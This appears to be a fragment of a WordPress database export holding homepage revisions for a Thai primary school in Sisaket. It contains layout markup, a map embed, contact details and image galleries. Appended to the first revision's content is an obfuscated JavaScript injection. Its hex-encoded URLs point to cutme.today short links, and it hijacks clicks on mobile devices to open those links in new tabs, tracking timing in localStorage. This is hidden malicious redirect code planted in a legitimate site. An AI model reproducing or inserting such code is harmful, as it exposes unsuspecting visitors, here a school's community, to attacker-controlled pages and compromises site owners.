:{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 13:40:56','2024-08-08 06:40:56','',14,'http://pakhaeng.ssk.in.th/?p=683',0,'revision','',0),
(685,1,'2024-08-08 13:45:58','2024-08-08 06:45:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" 